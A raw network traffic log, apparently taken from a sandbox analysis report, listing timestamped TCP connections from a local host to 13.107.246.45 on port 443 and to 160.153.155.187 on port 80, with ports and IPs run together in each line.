                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.082158089 CET51493443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.082164049 CET4435149313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.132697105 CET4435149413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.136662960 CET51494443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.136677980 CET4435149413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.137159109 CET51494443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.137164116 CET4435149413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.169702053 CET4435149613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.172650099 CET51496443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.172668934 CET4435149613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.173182964 CET51496443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.173191071 CET4435149613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.195473909 CET4435149213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.195549965 CET4435149213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.195688009 CET51492443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.196003914 CET51492443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.196003914 CET51492443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.196021080 CET4435149213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.196031094 CET4435149213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.198966980 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.199004889 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.199090958 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.199239016 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.199254990 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.207674980 CET4435149313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.207880020 CET4435149313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.207964897 CET51493443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.208190918 CET51493443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.208203077 CET4435149313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.208214045 CET51493443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.208219051 CET4435149313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.210738897 CET51499443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.210768938 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.210846901 CET51499443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.210987091 CET51499443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.210998058 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.260305882 CET4435149713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.262510061 CET4435149413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.262538910 CET4435149413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.262587070 CET4435149413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.262674093 CET51494443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.262695074 CET51494443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.273605108 CET51494443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.273619890 CET4435149413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.273632050 CET51494443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.273637056 CET4435149413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.273929119 CET51497443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.273953915 CET4435149713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.274482012 CET51497443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.274487972 CET4435149713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.277882099 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.277910948 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.278060913 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.278167963 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.278188944 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.299485922 CET4435149613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.299560070 CET4435149613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.299643993 CET51496443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.299920082 CET51496443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.299920082 CET51496443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.299935102 CET4435149613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.299945116 CET4435149613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.303149939 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.303184986 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.307573080 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.307790041 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.307802916 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.400497913 CET4435149713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.400806904 CET4435149713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.400912046 CET51497443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.400944948 CET51497443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.400965929 CET4435149713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.400979996 CET51497443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.400986910 CET4435149713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.404078960 CET51502443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.404114962 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.404211044 CET51502443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.404359102 CET51502443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.404372931 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.567055941 CET4973880192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.571906090 CET8049738160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.944175005 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.950083971 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.975296021 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.975318909 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.975775957 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.975780964 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.976015091 CET51499443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.976036072 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.976372957 CET51499443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.976378918 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.009190083 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.009747982 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.009779930 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.010212898 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.010236025 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.073110104 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.073765039 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.073779106 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.074425936 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.074440956 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125376940 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125396013 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125468969 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125571966 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125571966 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125869036 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125873089 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125873089 CET51498443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125894070 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125904083 CET4435149813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125926018 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.125977039 CET51499443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.126111031 CET51499443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.126131058 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.126142979 CET51499443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.126151085 CET4435149913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129199982 CET51504443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129235029 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129251957 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129283905 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129308939 CET51504443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129437923 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129487991 CET51504443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129498005 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129973888 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.129987955 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141428947 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141449928 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141503096 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141534090 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141618013 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141830921 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141830921 CET51500443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141850948 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.141861916 CET4435150013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.144884109 CET51505443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.144915104 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.145056009 CET51505443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.145330906 CET51505443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.145347118 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.146009922 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.146950960 CET51502443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.146961927 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.147466898 CET51502443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.147473097 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.208362103 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.208389997 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.208475113 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.208906889 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.208906889 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.208906889 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.212009907 CET51506443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.212038994 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.212089062 CET51501443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.212100983 CET4435150113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.212131023 CET51506443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.212332964 CET51506443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.212342024 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278424025 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278449059 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278631926 CET51502443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278650999 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278881073 CET51502443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278887987 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278904915 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278906107 CET51502443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.278927088 CET4435150213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.281734943 CET51507443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.281793118 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.281877995 CET51507443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.282037020 CET51507443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.282059908 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.862020969 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.862637043 CET51504443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.862652063 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.863146067 CET51504443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.863151073 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.871403933 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.871840954 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.871855021 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.872303963 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.872309923 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.872314930 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.872562885 CET51505443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.872590065 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.872911930 CET51505443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.872916937 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.939889908 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.940547943 CET51506443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.940567970 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.941059113 CET51506443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.941065073 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.993158102 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.993220091 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.993288040 CET51504443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.993556976 CET51504443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.993568897 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.993580103 CET51504443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:49.993585110 CET4435150413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.002887011 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003616095 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003676891 CET51505443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003725052 CET51505443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003739119 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003755093 CET51505443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003761053 CET4435150513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003896952 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003915071 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.003976107 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.004019022 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.004019976 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.004395008 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.004432917 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.004539967 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.005176067 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.005176067 CET51503443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.005197048 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.005206108 CET4435150313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.006290913 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.006302118 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.006864071 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.006891012 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.007333994 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.007333994 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.007333994 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.007344961 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.007375956 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.007515907 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.007715940 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.007724047 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.009490967 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.009843111 CET51507443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.009855986 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.010282040 CET51507443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.010288000 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.070466995 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.070676088 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.070723057 CET51506443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.070791960 CET51506443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.070801973 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.070813894 CET51506443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.070826054 CET4435150613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.073973894 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.074021101 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.074126959 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.074351072 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.074368000 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.308109045 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.308161020 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.308243036 CET51507443192.168.2.413.107.246.45
